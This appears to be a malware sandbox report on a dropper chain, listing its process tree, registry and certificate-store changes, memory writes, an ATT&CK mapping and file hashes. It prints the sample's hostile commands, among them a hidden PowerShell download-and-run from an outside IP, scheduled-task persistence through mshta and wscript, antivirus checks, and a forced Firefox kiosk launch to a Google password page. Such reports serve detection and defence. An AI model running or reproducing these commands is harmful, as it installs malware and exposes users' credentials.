\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 4a5a8f7ce6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 4a5a8f7ce6.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2276 schtasks.exe 652 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 2840 skotes.exe 1096 4a5a8f7ce6.exe 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 1688 b47b7bcbc1.exe 1824 Macromedia.com 1824 Macromedia.com 2548 46286aabf6.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 3032 powershell.exe 3032 powershell.exe 3032 powershell.exe 1644 TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE 3296 7a5595e3ff.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 2140 tasklist.exe Token: SeDebugPrivilege 2316 tasklist.exe Token: SeDebugPrivilege 2320 taskkill.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 2056 taskkill.exe Token: SeDebugPrivilege 2096 taskkill.exe Token: SeDebugPrivilege 1740 taskkill.exe Token: SeDebugPrivilege 872 firefox.exe Token: SeDebugPrivilege 872 firefox.exe Token: SeDebugPrivilege 3032 powershell.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 872 firefox.exe 872 firefox.exe 816 29b1d0bfe9.exe 872 firefox.exe 872 firefox.exe 816 29b1d0bfe9.exe 2800 bf8b735584.exe 2800 bf8b735584.exe 2800 bf8b735584.exe 816 29b1d0bfe9.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 1824 Macromedia.com 1824 Macromedia.com 1824 Macromedia.com 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 816 29b1d0bfe9.exe 872 firefox.exe 872 firefox.exe 816 29b1d0bfe9.exe 872 firefox.exe 816 29b1d0bfe9.exe 2800 bf8b735584.exe 2800 bf8b735584.exe 2800 bf8b735584.exe 816 29b1d0bfe9.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2280 wrote to memory of 2840 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 29 PID 2280 wrote to memory of 2840 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 29 PID 2280 wrote to memory of 2840 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 29 PID 2280 wrote to memory of 2840 2280 afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe 29 PID 2840 wrote to memory of 1788 2840 skotes.exe 31 PID 2840 wrote to memory of 1788 2840 skotes.exe 31 PID 2840 wrote to memory of 1788 2840 skotes.exe 31 PID 2840 wrote to memory of 1788 2840 skotes.exe 31 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 1680 1788 EzbI6jr.exe 32 PID 1788 wrote to memory of 3004 1788 EzbI6jr.exe 33 PID 1788 wrote to memory of 3004 1788 EzbI6jr.exe 33 PID 1788 wrote to memory of 3004 1788 EzbI6jr.exe 33 PID 1788 wrote to memory of 3004 1788 EzbI6jr.exe 33 PID 2840 wrote to memory of 700 2840 skotes.exe 34 PID 2840 wrote to memory of 700 2840 skotes.exe 34 PID 2840 wrote to memory of 700 2840 skotes.exe 34 PID 2840 wrote to memory of 700 2840 skotes.exe 34 PID 700 wrote to memory of 2208 700 9d9ff84207.exe 35 PID 700 wrote to memory of 2208 700 9d9ff84207.exe 35 PID 700 wrote to memory of 2208 700 9d9ff84207.exe 35 PID 700 wrote to memory of 2208 700 9d9ff84207.exe 35 PID 2208 wrote to memory of 2140 2208 cmd.exe 37 PID 2208 wrote to memory of 2140 2208 cmd.exe 37 PID 2208 wrote to memory of 2140 2208 cmd.exe 37 PID 2208 wrote to memory of 2140 2208 cmd.exe 37 PID 2208 wrote to memory of 1008 2208 cmd.exe 38 PID 2208 wrote to memory of 1008 2208 cmd.exe 38 PID 2208 wrote to memory of 1008 2208 cmd.exe 38 PID 2208 wrote to memory of 1008 2208 cmd.exe 38 PID 2840 wrote to memory of 1096 2840 skotes.exe 40 PID 2840 wrote to memory of 1096 2840 skotes.exe 40 PID 2840 wrote to memory of 1096 2840 skotes.exe 40 PID 2840 wrote to memory of 1096 2840 skotes.exe 40 PID 2208 wrote to memory of 2316 2208 cmd.exe 41 PID 2208 wrote to memory of 2316 2208 cmd.exe 41 PID 2208 wrote to memory of 2316 2208 cmd.exe 41 PID 2208 wrote to memory of 2316 2208 cmd.exe 41 PID 2208 wrote to memory of 2656 2208 cmd.exe 42 PID 2208 wrote to memory of 2656 2208 cmd.exe 42 PID 2208 wrote to memory of 2656 2208 cmd.exe 42 PID 2208 wrote to memory of 2656 2208 cmd.exe 42 PID 2208 wrote to memory of 2896 2208 cmd.exe 43 PID 2208 wrote to memory of 2896 2208 cmd.exe 43 PID 2208 wrote to memory of 2896 2208 cmd.exe 43 PID 2208 wrote to memory of 2896 2208 cmd.exe 43 PID 2208 wrote to memory of 2552 2208 cmd.exe 44 PID 2208 wrote to memory of 2552 2208 cmd.exe 44 PID 2208 wrote to memory of 2552 2208 cmd.exe 44 PID 2208 wrote to memory of 2552 2208 cmd.exe 44 PID 2208 wrote to memory of 1524 2208 cmd.exe 45 PID 2208 wrote to memory of 1524 2208 cmd.exe 45 PID 2208 wrote to memory of 1524 2208 cmd.exe 45 PID 2208 wrote to memory of 1524 2208 cmd.exe 45 PID 2208 wrote to memory of 3008 2208 cmd.exe 46 PID 2208 wrote to memory of 3008 2208 cmd.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe"C:\Users\Admin\AppData\Local\Temp\afcfb82c3f1a4399fd6fa9297c8b9417152bc798f2a194528a6af7faba5c6967.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\1052910001\EzbI6jr.exe"C:\Users\Admin\AppData\Local\Temp\1052910001\EzbI6jr.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\1052910001\EzbI6jr.exe"C:\Users\Admin\AppData\Local\Temp\1052910001\EzbI6jr.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 5164⤵
- Loads dropped DLL
- Program crash
PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052916001\9d9ff84207.exe"C:\Users\Admin\AppData\Local\Temp\1052916001\9d9ff84207.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:1008
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵
- System Location Discovery: System Language Discovery
PID:2656
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7646615⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Fm5⤵
- System Location Discovery: System Language Discovery
PID:2552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Tunnel" Addresses5⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com5⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F5⤵
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.comMacromedia.com F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1824 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2276
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵PID:2968
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:2544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052917001\4a5a8f7ce6.exe"C:\Users\Admin\AppData\Local\Temp\1052917001\4a5a8f7ce6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\1052918001\b47b7bcbc1.exe"C:\Users\Admin\AppData\Local\Temp\1052918001\b47b7bcbc1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\1052919001\46286aabf6.exe"C:\Users\Admin\AppData\Local\Temp\1052919001\46286aabf6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\1052920001\29b1d0bfe9.exe"C:\Users\Admin\AppData\Local\Temp\1052920001\29b1d0bfe9.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:816 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:3024
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:872 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="872.0.1507432617\244456697" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1140 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ecb7a2f-1476-4af6-9abd-ff6e5e0101da} 872 "\\.\pipe\gecko-crash-server-pipe.872" 1344 fceed58 gpu6⤵PID:928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="872.1.120718179\699204080" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9389355-bd60-4762-94a2-b5b2771b9672} 872 "\\.\pipe\gecko-crash-server-pipe.872" 1512 f74858 socket6⤵PID:2152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="872.2.715306826\244655355" -childID 1 -isForBrowser -prefsHandle 2012 -prefMapHandle 2008 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 712 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {887a2c74-9b8c-4643-95d9-472a7ee988aa} 872 "\\.\pipe\gecko-crash-server-pipe.872" 2024 18695158 tab6⤵PID:2452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="872.3.1719290803\1867486137" -childID 2 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 712 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4673769-5a49-42fb-a842-de6e7e63c88a} 872 "\\.\pipe\gecko-crash-server-pipe.872" 2928 1b2f5b58 tab6⤵PID:2560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="872.4.10416045\1864732787" -childID 3 -isForBrowser -prefsHandle 3972 -prefMapHandle 3968 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 712 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e10d07e6-5ce7-4467-a0f0-acbd3331f194} 872 "\\.\pipe\gecko-crash-server-pipe.872" 3984 19596e58 tab6⤵PID:2056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="872.5.238795342\1237103940" -childID 4 -isForBrowser -prefsHandle 4084 -prefMapHandle 4088 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 712 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {093f039e-ea44-4f7c-a9b2-2f6d46e82d80} 872 "\\.\pipe\gecko-crash-server-pipe.872" 4072 1f685f58 tab6⤵PID:2540
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="872.6.1601082546\15173152" -childID 5 -isForBrowser -prefsHandle 4268 -prefMapHandle 4272 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 712 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f4497e1-5431-4529-9c89-bfbc169c3b1a} 872 "\\.\pipe\gecko-crash-server-pipe.872" 4256 1fb4db58 tab6⤵PID:784
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052921001\bf8b735584.exe"C:\Users\Admin\AppData\Local\Temp\1052921001\bf8b735584.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 7H2iimaNbTG /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZSYFnD3fs.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:2160 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 7H2iimaNbTG /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZSYFnD3fs.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:652
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ZSYFnD3fs.hta4⤵
- System Location Discovery: System Language Discovery
PID:2960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'K3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Users\Admin\AppData\Local\TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE"C:\Users\Admin\AppData\Local\TempK3UJ5CVUORQKMPXAXMB98LFYXDTVW5OP.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1644
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052922001\7a5595e3ff.exe"C:\Users\Admin\AppData\Local\Temp\1052922001\7a5595e3ff.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3296
-
-
C:\Users\Admin\AppData\Local\Temp\1052923001\7d56d1650b.exe"C:\Users\Admin\AppData\Local\Temp\1052923001\7d56d1650b.exe"3⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\1052923001\7d56d1650b.exe"C:\Users\Admin\AppData\Local\Temp\1052923001\7d56d1650b.exe"4⤵PID:3684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 5164⤵
- Program crash
PID:3740
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD556a555dd8e65c5348ed2b7091348633d
SHA1371686fc43bc2d3650af8926dd65ecf58f3822cc
SHA2564c130218be4b12ba0aaa14072079456d30e20117637538ef2e0d845768955e30
SHA512a6527b87f161a49627beb7603cb51906c84d31b6b618b717b01e5ff105bf6b26eca5947c863761efcda10f0297dcf3409476d210852f53bcf3e392683989c6b9
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
549KB
MD5d9229fff67cf63494af7242d898c68a1
SHA14cf80b1dcfb5d9233e87d11b062f0c6ed9a5866c
SHA2566524beb8407321f618601a2194e5de4c07ee4aa1c53ede93208dd3385037d0e8
SHA5120bcef3f512a71be8d2d56160dbe0b26d840a33b1c546323046afb3f1a24e281a00cc118600442064df6553fdd3c697de346998b392df2751070ef90eac42c899
-
Filesize
846KB
MD5c3d89e95bfb66f5127ac1f2f3e1bd665
SHA1bd79a4a17cc8ad63abdde20d9de02d55d54903f9
SHA2565d07ad572a6a37d07d0b7ca990087960ad8850d7cfc56b8c7270c826c70fb56b
SHA512d85116e24cf07f3063837fab1859ae6d9313dd269e28844900cbebe7521df8c65db97bc122bb097e9887d686bdf8f786b93a06208d762fded9035d2c6448a111
-
Filesize
1.8MB
MD5c130357931a727566a3a776100cf1f02
SHA1c5da4040d2179c7c2a4367e356c8b010b0eff326
SHA256cba3aefa935818f76928c356d105d634363f6355a48e52ac321677d0a94504d1
SHA512d8c960ee698f62a0477e23210b6ff66a8de38f1e34285e0106eb39c9d8c41d268117d59a5ee8bb18ba7d8a3dc04500b66c0ddc4353c6f48dbf1e5f6d6998bc89
-
Filesize
1.8MB
MD5ef2aaf6328e522d6505a64978c956928
SHA1d2ee3d6c5dd57a35549a752cf50e775ad01eeb76
SHA2564204bff10546a4fff499e3638c08e0d1ca185cc2d9a25e79caa0e85aacd5e3d9
SHA512c888b4aa1550a02cb67fe636668ddf67d19eaa436fdeb24537197ab4dd2e57d811bd82bbcc4d4ef28b67354ec28df2a173333784e7ad243c1c7c78e3333b23b1
-
Filesize
1.7MB
MD50c934037292e1538c2f76cfb2b4c00e1
SHA1ebdd34bf1128d7e3bf195f0d457c807ccb7ba3f1
SHA2569caab04fb3c68579e9bca99a3120609230a107ebd80d12e2ae5dcff90bac4173
SHA51204eb2e6f880d5465e7417f4a60538107f44f139047b1b45aef715c4b17f01abfbaee095201be5e0995198adc626d9a65543f04eead687a04a5a489f01ca058b4
-
Filesize
944KB
MD5d1431b6da0ec22ef5f3b22d3059acd75
SHA1a4b0f4f65abc671f23a750aed42f6c5088469520
SHA256defb27b6f937529ef4f1457f0d2a8d996220c5ba288f97f6c0b2cb7e1ecc26bd
SHA5124a7f9f548b434eb6481561902c2b1e9cea75dd2ccd6d75e98482d2dca3bda4572dcc384313baa4045b504093c5418fc50b011ed1eef473c35f8116d1f810b1ba
-
Filesize
938KB
MD510f0fea718a086aa4a478fcef2fb184f
SHA153180779ada1e29e2cbc6e43cbddb774b916d88f
SHA256f5e3c61f96ba0e1986c5f9a2264b2d550d2aa080fd0cf40ed18773583590eb72
SHA51227098c55bf745144a0f912339c169835c9f721861effc9b87632620e744cfeec724a41f10f65e0fec4c367510f4c2e6a7fa65a0f195751064de2ed2b61deea6d
-
Filesize
1.8MB
